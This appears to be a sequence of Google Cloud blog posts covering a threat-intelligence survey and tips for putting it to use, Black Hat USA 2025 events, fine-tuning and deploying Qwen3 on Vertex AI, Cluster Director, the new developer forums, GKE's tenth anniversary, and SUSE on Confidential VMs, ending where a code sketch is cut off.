Key takeaways from the survey
Organizations value threat intelligence: More than 80% of organizations already use threat intelligence, or plan to, across eight major use cases.
Improving threat intelligence capabilities is challenging: Too many feeds (61%), too few analysts (60%), hard to derive clear action from threat intelligence data (59%), and difficulty determining which threats are valid (59%) were cited as the top challenges to actioning threat intelligence. All told, 82% are concerned about missing threats due to the volume of alerts and data.
Organizational blind spots: 80% of respondents said their senior leadership team underestimates threats to the organization, and 66% said they struggle to share threat intelligence with relevant teams.
Stuck in reactive mode: Too much data leaves security teams struggling to prioritize threats, creating significant security gaps. As a result, 86% of respondents said that their organization needs to improve its understanding of the threat landscape, 85% of respondents say that their organization could focus more time and energy on emerging critical threats, and 72% of respondents said they are mostly reactive to threats.
Helping defenders with AI: 86% of respondents agreed that they “must” use AI to improve their ability to operationalize threat intelligence. When asked about the benefits of using AI in threat intelligence, improving efficiency by generating easy-to-read summaries was cited most frequently (69%).
Organizations are using AI to help in a number of ways, including summarization, prioritization, and communication.
The Threat Intelligence Benchmark study underscores how complex the problem is, but we also see a path forward for even under-resourced organizations to get the most out of their threat intelligence. Through our engagements with customers and the broader threat intelligence community, we’ve developed suggestions on how organizations can maximize the resources they’ve already dedicated to threat intelligence.
How to operationalize threat intelligence more effectively
At Google Cloud, we’re strong advocates for security and IT leaders to integrate threat intelligence into their security environments as part of a comprehensive layered defense. The raw data of threat intelligence can be used to prevent, detect, and respond to attacks — as well as to inform broader strategic decision-making across the organization.
Here are four tactical steps to help you get started.
Step 1: Identify high-stakes intelligence needs
Security teams should use threat intelligence as a strategic tool to focus on the threats that are most relevant to their organization. It can be crucial in shaping the organization’s cyber threat profile (a structured way to identify, analyze, and prioritize potential cyber threats) and can help protect against the threats that matter most.
Define your crown jewels: Identify your most critical assets, data, and business functions, and calculate the impact if they’re compromised. This directly informs your Priority Intelligence Requirements (PIRs).
Know your adversaries: Pinpoint the threat actors most likely to target your IT environment and the industry that your organization operates in. Study their common tactics, techniques, and procedures (TTPs). Focus on intelligence related to these groups and their methods of intrusion.
Establish a feedback loop: Regularly ask your incident response (IR) and security operations center (SOC) teams about the threat intelligence that could have helped them prevent, detect, and respond faster to recent incidents. Their answers can be used to refine PIRs.
Understand how security enables the organization: Developing robust threat intelligence analysis is all about supporting smarter, faster decisions. Security should be a close partner to leadership and other teams, focused on enabling the organization to achieve its goals while minimizing risk.
Step 2: Build a tactical threat intelligence pipeline
In cybersecurity, efficiency is key. The goal is to get threat intelligence from source to action as quickly as possible.
Centralized aggregation: Implement a Threat Intelligence Platform (TIP) and use existing security information and event management (SIEM) capabilities to ingest, normalize, and de-duplicate threat intelligence from all sources (OSINT, commercial feeds, ISACs, dark web monitoring).
Automated enrichment: Automatically enrich incoming indicators (IPs, domains, hashes) with context such as geolocation, reputation scores, and associated threat actors. Tools should do the heavy lifting.
Prioritization engine: Instead of letting analysts manually triage thousands of alerts, develop rules in your TIP and SIEM to automatically score and prioritize intelligence based on its relevance to your PIRs and its severity (a minimal sketch of this kind of scoring follows this list).
Direct integration with controls: Push relevant, high-fidelity indicators and detection rules directly to firewalls and proxies, endpoint and extended detection and response (EDR and XDR) tools, intrusion detection and prevention systems (IDS and IPS), and SIEM systems.
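As an illustration of the scoring logic such a prioritization engine encodes, here is a minimal, tool-agnostic sketch in Python; the fields, weights, and PIR tags are hypothetical and would come from your TIP or SIEM in practice.

from dataclasses import dataclass

# Hypothetical PIR tags defined by the organization.
PRIORITY_TAGS = {"ransomware", "credential-theft", "supply-chain"}

@dataclass
class Indicator:
    value: str       # e.g., an IP, domain, or file hash
    severity: int    # 0-100, from the feed or enrichment
    reputation: int  # 0-100, lower means worse reputation
    tags: set        # threat categories attached during enrichment

def priority_score(ind: Indicator) -> float:
    """Weight severity and poor reputation, then boost PIR-relevant indicators."""
    pir_boost = 25.0 if ind.tags & PRIORITY_TAGS else 0.0
    return 0.6 * ind.severity + 0.4 * (100 - ind.reputation) + pir_boost

indicators = [
    Indicator("198.51.100.7", severity=80, reputation=10, tags={"ransomware"}),
    Indicator("example-cdn.net", severity=30, reputation=70, tags={"adware"}),
]

# Triage queue: highest-priority indicators first.
for ind in sorted(indicators, key=priority_score, reverse=True):
    print(f"{ind.value}: {priority_score(ind):.1f}")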
Step 3: Empower security teams
Two important ways to make threat intelligence genuinely helpful to IT and security professionals are freeing analysts from toil and focusing on training and tooling.
Analyst focus: Free up your SOC and IR analysts from data ingestion and basic correlation. Their time is better spent on proactive threat hunting, contextualizing alerts, developing custom detections, and augmenting incident response.
Training and expertise: 79% of survey respondents said that external threat intelligence providers should help “uplevel junior staff or embed a threat intelligence (CTI) analyst” into their team. Give analysts focused training on shifting to a more intelligence-led approach, and provide threat intelligence expertise tailored to your organization.
Step 4: Measure and adapt continuously
Threat intelligence operationalization is an ongoing cycle, not a one-time project.
Key metrics: Track these key threat intelligence metrics and ask the following questions for each:
Mean time to detect (MTTD) and mean time to respond (MTTR) reduction: Does threat intelligence help us detect and respond to threats faster?
Alert fidelity: Are we seeing fewer false positives due to better-contextualized alerts from threat intelligence?
Blocked threats: How many threats were proactively blocked by systems fed with threat intelligence?
Hunting success: How many new threats were identified through intelligence-led hunting?
Regular reviews: Monthly or quarterly review of PIRs, threat intelligence sources, and the effectiveness of integrations can help keep your threat intelligence strategy current.
Incident-driven refinement: After every significant incident, conduct a lessons-learned session specifically on the contributions that threat intelligence made to the incident response.
How Google Threat Intelligence can help
Despite concerns about data overload, 80% of survey respondents said that threat intelligence providers should offer information sources that are both broad and deep. Security teams should feel confident that they have a holistic view of available intelligence.
Augmented by advanced AI, Google Threat Intelligence provides unparalleled visibility into threats, enabling us to deliver detailed and timely threat intelligence to security teams around the world. It combines Mandiant frontline expertise, the global reach of the VirusTotal community, and the breadth of visibility only Google can deliver.
Our Advanced Intelligence Access (AIA) and Essential Intelligence Access (EIA) programs provide organizations with access to embedded and targeted intelligence experts, as well as early access to threat data. Mandiant Academy offers training courses for security professionals, including many focused on how to best consume and apply threat intelligence to improve tactical defenses and overall security posture.
At Google Cloud Security, our mission is to empower organizations to strengthen their defenses with innovative security capabilities, all while simplifying and modernizing their cybersecurity. In a world of evolving threats and increasing complexity, we believe true security comes from clarity, not more noise.
We’re excited to bring this commitment to innovation and simplification to Black Hat USA 2025, where you can discover how Google Cloud Security and Mandiant can help you navigate the complex threat landscape, adopt agentic security, and make Google an extension of your security team.
From connecting with our security experts to witnessing innovative cloud security technology in action, we’re offering Black Hat attendees a packed schedule of booth activities, insightful sessions, and exclusive events.
Visit our booth and connect with experts
Booth #2240 is where you can meet the Google Cloud Security team. Discover our latest innovations and learn directly from Mandiant experts about the techniques and tactics from their most recent investigations. See firsthand how agentic security can help you detect and remove threats more effectively and make your security team more productive.
Experience our expanded demo landscape
Catch our on-demand product and service demos during Business Hall/Expo hours to learn how Google Cloud Security can protect your organization. Plus, connect with our security experts and partners to discuss your specific needs.
Google Threat Intelligence: Experience how you can get ahead of the latest threats with Google Threat Intelligence. Know who’s targeting you and focus on the most relevant threats to your organization.
Google Security Operations: Discover how our intelligence-driven, AI-powered security operations platform combines Google’s hyper-scale infrastructure with unparalleled visibility into and understanding of cyber adversaries, enabling security teams to uncover the latest cyber threats in near real-time.
AI for Defenders: Learn how AI agents in Google Cloud Security products can autonomously investigate threats, triage alerts, and resolve misconfigurations. Join us as we demo how AI agents can automate manual and repetitive tasks to help you move from insight to action faster.
Cloud Security: Explore how Google Cloud provides built-in, secure controls to help you maintain a strong cloud security posture. See in action how the products recommended in Google Cloud’s Security Foundation help address the most common cloud adoption use cases.
Mandiant Incident Response: Learn how Mandiant uses frontline experience with threat intelligence and incident response to help organizations like yours tackle top cloud security challenges.
Chrome Enterprise: Stop by to find out why Chrome is the most trusted enterprise browser, meeting the secure enterprise browsing needs of today’s workforce.
Join us at Google Cloud Security Hub
Beyond the main expo hall, make your way to the Google Cloud Security Hub, located conveniently in The Cove next to Libertine Social at Mandalay Bay. From the expo hall, head past the Starbucks, and our Customer Hub will be on your right. Here’s a detailed map for easy way-finding:
How to find Google Cloud at the conference.
The Hub is home to several exclusive events and spaces:
Enjoy the exclusive Customer Lounge
Looking for a place to recharge and connect in a more relaxed setting? If you schedule a meeting with our team, you’ll gain exclusive access to our Customer Lounge at the Google Hub. We’ll have snacks, beverages, and a comfortable space for you to take a break from the conference floor. Reach out to your sales representative to schedule your meeting and get on the guest list.
Unwind at the Google Cloud Security Happy Hour
Join us for the Google Cloud Security Happy Hour on Wednesday, Aug. 6, from 5:00 p.m. to 7:00 p.m., at the Google Hub for a relaxed evening of networking. It’s the perfect opportunity to unwind after a day of briefings and connect with our team and your peers.
Attend the Threat Briefing and dinner
Customers are invited to join us for an exclusive Threat Briefing and Dinner on Tuesday, Aug. 5, from 6:00 p.m. to 9:00 p.m., at the Google Hub. You’ll gain deep insights from Mandiant Intelligence, with a special briefing from Luke McNamara, deputy chief analyst.
Enhance your skills with Mandiant Academy training
Improve your expertise with hands-on training directly from Mandiant’s frontline cybersecurity experts. Mandiant Academy is offering the following courses during Black Hat (requires prior registration):
With your Briefing conference pass, you can attend these sessions where Google Cloud Security and Mandiant experts will share their insights:
Bridging the AI reality gap: Join Vijay Ganti (director, product management, Google Cloud Security) and Spencer Lichtenstein (group product manager, Google Security Operations) as they pull back the curtain on AI in security. In the session, they’ll dive deep into how Google is integrating AI into its security products. You’ll learn about the rigorous data science processes we use to measure every task of the end-to-end system, and why this meticulous approach is crucial for giving you an edge against threat actors. We’ll also share the latest, most impactful agent demos.
Participate in an OT Incident Response: Join Tim Gallo (head of global solution architects, Google Cloud Security) and Paul Shaver (global OT security lead, Google Cloud Security) for a unique, interactive session where you can experience what it’s truly like to navigate a critical operational technology (OT) incident. In this live session, you’ll step into the shoes of a Mandiant Incident Responder as we guide you through a simulated OT incident. You’ll see firsthand the crucial decision points, compare your choices with those of our experts, and gain invaluable insights into the complexities of real-world OT incident response.
Autonomous Timeline Analysis and Threat Hunting: An AI Agent for Timesketch: In this talk, we will present the first AI-powered agent capable of autonomously performing digital forensic analysis on the large and varied log volumes typically encountered in real-world incidents. We will demonstrate the agent’s proficiency in threat hunting and evaluate our technique on a dataset of 100 diverse, real-world compromised systems.
The Ransomware Response Playbook: Join this session where security experts will discuss how best to prepare for and handle a ransomware extortion attack against your business. This panel discussion will explore critical questions such as: Where is the malicious payload and how is it spreading? How do you interact and barter with your attacker (or not)? Who do you call? Are your backups protected?
At its core, FACADE is a novel self-supervised ML system that detects suspicious actions by analyzing the context of corporate logs, leveraging a unique contrastive learning strategy. This, combined with an innovative clustering approach, leads to unparalleled accuracy: a false positive rate under 0.01%, and as low as 0.0003% for single rogue actions. This session will not only present the underlying technology but also demonstrate how to use the recently released FACADE open-source version to protect your own organization.
Threat Space Workshop: Join Nadean Tanner for this hands-on experience with Harbinger, an AI-powered red teaming platform for streamlined operations and enhanced decision-making.
Learn about open-source solutions at Arsenal
Harbinger: An AI-Powered Red Teaming Platform for Streamlined Operations and Enhanced Decision-Making: Harbinger is an AI-powered platform that streamlines your workflow by integrating essential components, automating tasks, and providing intelligent insights. It consolidates data from various sources, automates playbook execution, and uses AI to suggest your next moves, making red teaming more efficient and effective. With Harbinger, you can focus on what matters most – achieving your objectives and maximizing the impact of your assessments.
Timesketch: AI-Powered Super Timeline Analysis: Timesketch is a leading free, open-source tool (licensed under Apache-2.0) for collaborative forensic-timeline analysis, with more than 2.6k stars on GitHub. At Arsenal, we will announce and showcase the Timesketch AI extension, designed to drastically speed up human analysts, identify the root cause of compromises, and improve incident reaction time. This demo will showcase AI-driven investigations in Timesketch, highlighting its ability to:
Autonomously analyze timelines, answer investigative questions, identify key events, and find the root cause of compromises.
Provide interactive review, empowering analysts to verify, edit, and refine AI-generated findings with clear links to supporting facts, emphasizing human validation.
Facilitate collaborative timeline analysis by integrating with Timesketch’s collaborative environment, enabling teamwork on AI-powered investigations.
Meet you there
Black Hat USA 2025 promises to be an impactful week, and Google Cloud Security is ready to share valuable knowledge and innovative solutions. We encourage you to make the most of your time by visiting our booth, attending our sessions, re-energizing at the Google Cloud Security Hub, and connecting with our team.
We’re eager to discuss your security challenges and demonstrate how Google can be your strategic security partner in the face of evolving threats.
Developers building with gen AI are increasingly drawn to open models for their power and flexibility. But customizing and deploying them can be a huge challenge. You’re often left wrestling with complex dependencies, managing infrastructure, and fighting for expensive GPU access.
Don’t let that complexity slow you down.
In this guide, we’ll walk you through the end-to-end lifecycle of taking an open model from discovery to a production-ready endpoint on Vertex AI. We’ll use fine-tuning and deploying Qwen3 as our example, showing you how Vertex AI handles the heavy lifting so you can focus on innovation.
Part 1: Quickly choose the right base model
So you’ve decided to use an open model for your project. But which model, on what hardware, and with which serving framework? The open model universe is vast, and the “old way” of finding the right model is time-consuming. You could spend days setting up environments, downloading weights, and wrestling with requirements.txt files just to run a single test.
This is a common place for projects to stall. But with Vertex AI, your journey starts in a much better place: the Vertex AI Model Garden, a curated hub that simplifies the discovery, fine-tuning, and deployment of cutting-edge open models. It offers more than 200 validated options (and growing!), including popular choices like Gemma, Qwen, DeepSeek, and Llama. Comprehensive model cards offer crucial information, including details on recommended hardware (such as GPU types and sizes) for optimal performance. Additionally, Vertex AI has default quotas for dedicated on-demand capacity of the latest Google Cloud accelerators to make it easier to get started.
Qwen 3 Model card on Vertex AI Model Garden
Importantly, Vertex AI conducts security scans on these models and their containers, adding a layer of trust and mitigating potential vulnerabilities from the outset. Once you’ve found a model for your use case, like Qwen3, Model Garden provides one-click deployment options and pre-configured notebooks, making it easy to deploy the model as an endpoint using the Vertex AI inference service, ready to be integrated into your application.
Qwen3 Deployment options from Model Garden
Additionally, Model Garden provides optimized serving containers (often leveraging vLLM, SGLang, or Hex-LLM) specifically designed for high-throughput, performant model serving. Once your model is deployed (via a quick-deploy endpoint or a notebook), you can start experimenting and establishing a baseline for your use case. This baseline lets you benchmark your fine-tuned model later on.
Model Inference framework options
Qwen3 quick deployment on Endpoint
It’s important to incorporate evaluation early in the process. You can leverage Vertex AI’s Gen AI evaluation service to assess the model against your own data and criteria, or integrate open-source frameworks. This essential early validation ensures you confidently select the right base model.
By the end of this experimentation and research phase, you’ll have efficiently navigated from model discovery to initial evaluation ready for the next step.
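Establishing that baseline can be as simple as sending a few representative prompts to the deployed endpoint. Below is a minimal sketch using the Vertex AI SDK; the endpoint ID is a placeholder, and the instance schema assumes a vLLM-style serving container, so adjust both to match your deployment.

from google.cloud import aiplatform

aiplatform.init(project="my-project", location="us-central1")

# Placeholder endpoint ID; copy yours from the Model Garden deployment.
endpoint = aiplatform.Endpoint(
    "projects/my-project/locations/us-central1/endpoints/1234567890"
)

# The instance schema below assumes a vLLM-style serving container.
response = endpoint.predict(instances=[{
    "prompt": "Explain the difference between LoRA and QLoRA in two sentences.",
    "max_tokens": 128,
    "temperature": 0.2,
}])
print(response.predictions[0])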
Part 2: Start parameter efficient fine-tuning (PEFT) with your data
You’ve found your base model – in this case, Qwen3. Now for the magic: making it yours by fine-tuning it on your specific data. This is where you can give the model a unique personality, teach it a specialized skill, or adapt it to your domain.
Step 1: Get your data ready. Data loading can often be a bottleneck, but Vertex AI makes it simple. You can seamlessly pull your datasets directly from Google Cloud Storage (GCS) and BigQuery (BQ). For more complex data-cleaning and preparation tasks, you can build an automated Vertex AI Pipeline to orchestrate the preprocessing work for you.
Step 2: Fine-tune hands-on in the notebook. Now you can start fine-tuning your Qwen3 model. Model Garden provides a pre-configured notebook for Qwen3 that uses Axolotl, a popular fine-tuning framework. This notebook already includes optimized settings for techniques like:
QLoRA: A highly memory-efficient tuning method, perfect for running experiments without needing massive GPUs.
FSDP (Fully Sharded Data Parallelism): A technique for distributing a large model across multiple GPUs for larger-scale training.
You can run the Qwen3 fine-tuning process directly inside the notebook. This is the perfect “lab environment” for quick experiments to discover the right configuration for the fine-tuning job.
Step 3: Scale up with Vertex AI Training. Experimenting in a notebook is a great start, but you may need more GPU resources and flexibility for customization. This is when you graduate from the notebook to a formal Vertex AI Training job.
Instead of being limited by a single notebook instance, you submit your training configuration (using the same container) to Vertex AI’s managed training service, which offers more scalability, flexibility, and control. Here’s what that gives you:
On-demand accelerators: Access an on-demand pool of the latest accelerators (like H100s) when you need them, or choose DWS Flex Start, Spot VMs, or bring-your-own-reservation options for more flexibility or stability.
Managed infrastructure: No need to provision or manage servers or containers. Vertex AI handles it all. You just define your job, and it runs.
Reproducibility: Your training job is a repeatable artifact, making it easier to use in an MLOps workflow.
Once your job is running, you can monitor its progress in real-time with TensorBoard to watch your model’s loss and accuracy improve. You can also check in on your tuning pipeline.
Beyond Vertex AI Training jobs, you can also use Ray on Vertex AI, or take a DIY approach on GKE or Compute Engine, depending on the flexibility and control you need.
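As a rough sketch of what submitting such a job can look like with the Vertex AI SDK, consider the following; the container URI, config path, and machine shape are placeholders rather than the notebook’s exact settings.

from google.cloud import aiplatform

aiplatform.init(
    project="my-project",
    location="us-central1",
    staging_bucket="gs://my-bucket",
)

# Reuse the same fine-tuning container from the notebook (URI is a placeholder).
job = aiplatform.CustomContainerTrainingJob(
    display_name="qwen3-qlora-finetune",
    container_uri="us-docker.pkg.dev/my-project/training/axolotl-finetune:latest",
)

job.run(
    args=["--config", "gs://my-bucket/configs/qwen3-qlora.yaml"],
    replica_count=1,
    machine_type="a2-highgpu-1g",           # placeholder; size per Model Garden guidance
    accelerator_type="NVIDIA_TESLA_A100",
    accelerator_count=1,
)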
Part 3: Evaluate your fine-tuned model
After fine-tuning your Qwen3 model on Vertex AI, robust evaluation is crucial to assess its readiness. Compare the evaluation results to the baseline you created during experimentation.
For complex generative AI tasks, Vertex AI’s Gen AI Evaluation Service uses a ‘judge’ model to assess nuanced qualities (coherence, relevance, groundedness) and task-specific criteria, supporting side-by-side (SxS) human reviews. Using the GenAI SDK, you can programmatically evaluate and compare your models. This service provides deep, actionable insights into model performance—going far beyond simple metrics like perplexity by also incorporating automated side-by-side comparisons and human review.
In the evaluation notebook, we evaluated our fine-tuned Qwen3 model against the base model using the GenAI Evaluation Service. For each query, we provided responses from both models and used the pairwise_summarization_quality metric to let the judge model determine which performed better.
For evaluation of other popular models, refer to this notebook.
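Under stated assumptions (the vertexai evaluation SDK, and a small pandas DataFrame holding each prompt plus both models’ responses), a pairwise comparison might look like the sketch below; the column names follow the service’s documented schema, but treat the details as illustrative.

import pandas as pd
from vertexai.evaluation import EvalTask

# Each row: a prompt, the fine-tuned model's response, and the base model's response.
eval_df = pd.DataFrame({
    "prompt": ["Summarize this support ticket: ..."],
    "response": ["<fine-tuned Qwen3 output>"],
    "baseline_model_response": ["<base Qwen3 output>"],
})

# The judge model decides which response is better for each prompt.
task = EvalTask(dataset=eval_df, metrics=["pairwise_summarization_quality"])
result = task.evaluate()
print(result.summary_metrics)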
Part 4: Deploy to a production endpoint
Your model has been fine-tuned and validated. It’s time for the final, most rewarding step: deploying it as an endpoint. This is where many projects hit a wall of complexity, but with Vertex AI Inference it’s a streamlined process. When you deploy to a Vertex AI Endpoint, you’re not just getting a server; you’re getting a fully managed, production-grade serving stack optimized for two key things:
1. Fast performance
Optimized serving: Your model is served using a container built with cutting-edge frameworks like vLLM, ensuring high throughput and low latency.
Rapid start-up: Techniques like fast VM startup, container image streaming, model weight streaming, and prefix caching mean your model can start up quickly.
2. Cost-effective and flexible scaling
You have full control over your GPU budget. You can:
Use on-demand GPUs for standard workloads.
Apply existing Committed Use Discounts (CUDs) and reservations to lower your costs.
Use Dynamic Workload Scheduler (DWS) Flex Start to acquire capacity for up to 7 days at a discount.
Leverage Spot VMs for fault-tolerant workloads to get access to compute at a steep discount.
In short, Vertex AI Inference handles the scaling, the infrastructure, and the performance optimization. You just focus on your application.
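As a final sketch of what that step can look like in code (uploading the tuned model with a serving container and deploying it to a managed endpoint via the Vertex AI SDK; the URIs and machine shape are placeholders):

from google.cloud import aiplatform

aiplatform.init(project="my-project", location="us-central1")

# Register the fine-tuned artifacts with a serving container (URIs are placeholders).
model = aiplatform.Model.upload(
    display_name="qwen3-finetuned",
    artifact_uri="gs://my-bucket/qwen3-finetuned/",
    serving_container_image_uri="us-docker.pkg.dev/my-project/serving/vllm:latest",
)

# Deploy to a managed endpoint that autoscales between one and two replicas.
endpoint = model.deploy(
    machine_type="a2-highgpu-1g",           # placeholder; size to your model
    accelerator_type="NVIDIA_TESLA_A100",
    accelerator_count=1,
    min_replica_count=1,
    max_replica_count=2,
)
print(endpoint.resource_name)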
Get started
Successfully navigating the lifecycle of an open model like Qwen on Vertex AI, from initial idea to production-ready endpoint, is a significant achievement. You’ve seen how the platform provides robust support for experimentation, fine-tuning, evaluation, and deployment.
Want to explore your own open model workload? The Vertex AI Model Garden is a great place to start.
In April, we released Cluster Director, a unified management plane that makes deploying and managing large-scale AI infrastructure simpler and more intuitive than ever, putting the power of an AI supercomputer at your fingertips. Today, we’re excited to release new features in preview, including an intuitive interface, a managed Slurm experience, and an observability dashboard that catches performance anomalies.
From complex configuration to easy creation
AI infrastructure users can spend weeks wrestling with complex configurations for compute, networking, and storage. Because distributed training workloads are highly synchronized jobs across thousands of nodes and are highly sensitive to network latency, performance bottlenecks can be difficult to diagnose and resolve. Cluster Director solves these challenges with a single, unified interface that automates the complex setup of AI and HPC clusters, integrating Google Cloud’s optimized compute, networking, and storage into a cohesive, performant, and easily managed environment.
LG Research uses Google Cloud to train their large language models, most recently Exaone 3.5. They have significantly reduced the time it takes to have a cluster running with their code — from over a week to less than one day. That’s hundreds of GPU hours saved for real workloads.
“Thanks to Cluster Director, we’re able to deploy and operate large-scale, high-performance GPU clusters flexibly and efficiently, even with minimal human resources.” – Jiyeon Jung, AI Infra Sr Engineer, LG AI Research
Biomatter uses Google Cloud to scale its in silico design processes. Cluster Director has made cluster deployment and management smooth, enabling the team to dedicate more focus to the scientific challenges at the core of their work.
“Cluster Director on Google Cloud has significantly simplified the way we create, configure, and manage Slurm-based AI and HPC clusters. With an intuitive UI and easy access to GPU-accelerated instances, we’ve reduced the time and effort spent on infrastructure.” – Irmantas Rokaitis, Chief Technology Officer, Biomatter
Read on for what’s new in the latest version of Cluster Director.
Simplified cluster management across compute, network, and storage
Use a new, intuitive view in the Google Cloud console to easily create, update, and delete clusters. Instead of a blank slate, you start with a choice of validated, optimized reference architectures. You can add one or more machine configurations from a range of VM families (including A3 and A4 GPU VMs) and specify the machine type, the number of GPUs, and the number of instances. You can also choose your consumption model: on-demand capacity (where supported), DWS Calendar mode or Flex Start, Spot VMs for cost savings, or a specific reservation for capacity assurance.
Cluster Director also simplifies networking by allowing you to deploy the cluster on a new, purpose-built VPC network or an existing one. If you create a new network, the firewall rules required for internal communication and SSH access are configured automatically, removing a common pain point. For storage, you can create and attach a new Filestore or Google Cloud Managed Lustre instance, or connect to an existing Cloud Storage bucket. These integrations help ensure that your high-performance file system is correctly mounted and available to all nodes in the cluster from the moment they launch.
Powerful job scheduling with Managed Slurm
Cluster Director provides fault-tolerant and highly scalable job scheduling out of the box with a managed, pre-configured Slurm environment. The controller node is managed for you, and you can easily configure the login nodes, including machine type, source image, and boot-disk size. Partitions and nodesets are pre-configured based on your compute selections, but you retain the flexibility to customize them, now or in the future.
Topology-aware placement
To maximize performance, Cluster Director is deeply integrated with Google’s network topology. This begins when clusters are created, when VMs are placed in close physical proximity. Crucially, this intelligence is also built directly into the managed Slurm environment. The Slurm scheduler is natively topology-aware, meaning it understands the underlying physical network and automatically co-locates your job’s tasks on nodes with the lowest-latency paths between them. This integration of initial placement and ongoing job scheduling is a key performance enhancer, dramatically reducing network contention during large, distributed training jobs.
Comprehensive visibility and insights
Cluster Director’s integrated observability dashboard provides a clear view of your cluster’s health, utilization, and performance, so you can quickly understand your system’s behavior and diagnose issues in a single place. The dashboard is designed to easily scale to tens of thousands of VMs.
Advanced diagnostics to detect performance anomalies
In distributed ML training, stragglers refer to small numbers of faulty or slow nodes that eventually slow down the entire workload. Cluster Director makes it easy to quickly find and replace stragglers to avoid performance degradation and wasted spend.
Try out Cluster Director today!
We are excited to invite you to be among the first to experience Cluster Director. To learn more and express your interest in joining the preview, talk to your Google Cloud account team or sign up here. We can’t wait to see what you will build.
Building applications is sometimes messy, it’s always iterative, and it often works best when it’s collaborative. As a developer, you regularly experience the frustration of a cryptic error message and the quiet triumph of finding a clever workaround. Either way, finding help or sharing success is best facilitated by a community of builders.
That’s why we are excited to launch the Google Developer Program forums at discuss.google.dev. The new forums are designed to help people build with Google technology. You will find discussion groups to engage with other developers and Google experts; how-to articles, reference architectures and use cases; and a community of users looking to help.
We’re also migrating the existing Google Cloud, Workspace Developer, AppSheet, and Looker communities, channels and content from googlecloudcommunity.com over to discuss.google.dev. So, existing knowledge isn’t lost – it’s just moving to a new home. And by migrating the community we’re able to focus on two core principles in the new design: high trust and high utility.
Signal over noise
Your Google Developer Program profile is how you will access the forums. By unifying our sign-in and connecting forum profiles directly to Google Developer Program profiles, we can programmatically display the credentials and reputation you’ve earned through learning, events, and meetups across the Google ecosystem.
We’re starting with the Google Developer Expert flair icon next to a user’s name and we plan to extend this to other programs in the near future. Additionally, if you are part of a private product beta or Early Access Program (EAP), your forum account is automatically granted access to the corresponding private discussion groups. No more filling out forms or waiting for permissions. Your Developer Program profile is your passport.
Why we chose Discourse for our new forums
While we were tempted to build a custom solution from scratch, we chose Discourse for a few key reasons:
Built by and for developers: Discourse is an open-source platform that prioritizes function over flash with markdown, code formatting, keyboard navigation, and structured conversations.
Extensibility: Its robust API and plugin architecture allow us to integrate our own Google technologies—like Gemini-powered spam filtering and the Google Developer Program—without reinventing the wheel.
This is your invitation!
This new community is a space for all of us. Come say hello! Ask a question, or answer one. Share what you’re working on, or get help with what you’re stuck on. This is where the real work happens, and we want to be a part of it with you.
In the coming months, you’ll see more of our engineers, product managers, and developer advocates join the conversation to not only help answer questions, but also ask them, share their own ideas, and engage with the same passion as you do. They won’t always have a perfect solution to a tricky question, but they’re committed to listening, engaging, and working with the community to find the best path forward.
How to Get Started
Explore Now: Visit https://discuss.google.dev. Browse the categories, read ongoing discussions, and find your community.
Join the Conversation: If you’re a Google Developer Program member, sign in and dive in! Ask those tough questions, share your solutions, and contribute your expertise. Not a member yet? Visit developers.google.com/program to learn more and join at no cost.
For googlecloudcommunity.com users: We’re working to make the transition as smooth as possible. You’ll find familiar topics and a wealth of historical discussions here. We encourage you to explore and continue your conversations on this new, unified platform.
The evolution of the cloud has been tremendous over the past decade. Every step of the way, Google Kubernetes Engine (GKE) has been there to meet new challenges. From giving DevOps more scalable foundations to supporting the rise of cloud-native AI, we took Kubernetes’ brilliance and gave it the fully managed service it deserved to thrive.
GKE turns 10 this year, and to celebrate, we’ve launched 10 years of GKE, an ebook that explores this incredible decade and how customers have built global businesses powered on this managed platform. We released Kubernetes as open source in 2014, and one million contributions later, we couldn’t be prouder of what Kubernetes has become, its history, and its future with GKE.
GKE’s leading lights
One of the earliest GKE customers was Signify, a global leader in lighting for professionals and the company behind Philips Hue. Ten years on, it continues to thrive on the service. Growing from 200 million to 3.5 billion daily transactions, Signify scaled from one GKE cluster to seven, and is looking to leverage GKE for new workloads, including platform engineering and AI for multi-cluster supervision.
“The constant improvements made by GKE over the past 10 years profoundly changed the way we design, deploy, and evolve our services,” says Leon Bouwmeester, Director of Engineering and Head of Hue Platform at Signify. “We spend less time on infrastructure management and can focus our efforts on what really matters: the quality of the user experience and the speed of innovation.”
However, what put GKE on the map was Pokémon GO, Niantic’s ground-breaking geolocation game. As millions took to the streets to catch ‘em all, GKE brought the game to life and kept up with its explosive launch. “Never have I taken part in anything close to the growth that Google Cloud customer Niantic experienced with the launch of Pokémon GO,” says Luke Stone, director of customer reliability engineering at Google Cloud.
Target vs. worst case vs. actual traffic to GKE during Niantic’s launch of Pokémon Go.
AI for tomorrow on GKE today
Today, GKE supports brand new businesses in the rapidly evolving world of AI. Customers report how their AI initiatives are made more powerful on GKE, helping them manage the complex demands of their deployments. This means flexibility and scale for AI workloads and cost-efficient inference — so you can focus on training, not managing.
With GKE Autopilot, AI can also help you optimize your configurations and workloads. In the ebook, learn more about how GKE Autopilot mode frees up teams to focus on innovation, with businesses sharing how they automatically improved performance and cost savings — with the stability and security they expect from Google Cloud.
Join the celebration by exploring 10 years of GKE for yourself. We‘ve distilled a decade of insights into what makes GKE so effective, thoughts from customers on how GKE is supporting their work at scale, and why we’re ready for everything AI has in store for the decade ahead. It’s been an amazing ride, and with AI reshaping the future of application development, we’re just getting started.
Securing sensitive data is a crucial part of moving workloads to the cloud. While encrypting data at rest and in transit are standard security practices, safeguarding data in use — while it’s actively being processed in memory — can present unique security and privacy challenges.
To make sure that data in use is also protected, we developed Confidential Computing with our hardware partners to use hardware-based Trusted Execution Environments (TEEs) to isolate and safeguard data in use, even from the cloud provider hosting the data.
To help build a secure and reliable cloud environment, we’ve partnered with SUSE, a global leader in open source and secure enterprise solutions. Together, we’ve developed targeted solutions that can enable organizations to run their sensitive workloads in the cloud, combining the hardware-based security of Google Cloud Confidential Virtual Machines (Confidential VMs) with the security of SUSE Linux Enterprise Server (SLES).
Today, we are excited to announce that SUSE Linux Enterprise Server now supports Google Cloud Confidential VMs that have Confidential Computing technologies AMD SEV, AMD SEV-SNP, or Intel TDX enabled. Previously, SLES was only generally available on AMD SEV and AMD SEV-SNP-based Confidential VMs, but now SLES is also generally available on Intel TDX-based Confidential VMs which run on the performant C3 machine series. This new offering provides customers more choice and flexibility in securing sensitive workloads, while expanding Confidential VM support for guest operating system images.
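For readers who want to try this, here is a minimal sketch of launching a TDX-based Confidential VM on C3 with the google-cloud-compute Python client. The project, zone, machine type, and SLES image path are illustrative assumptions (consult SUSE’s published image catalog for real names), and the confidential_instance_type field assumes a recent client library version:

```python
# Minimal sketch: create an Intel TDX Confidential VM on a C3 machine type.
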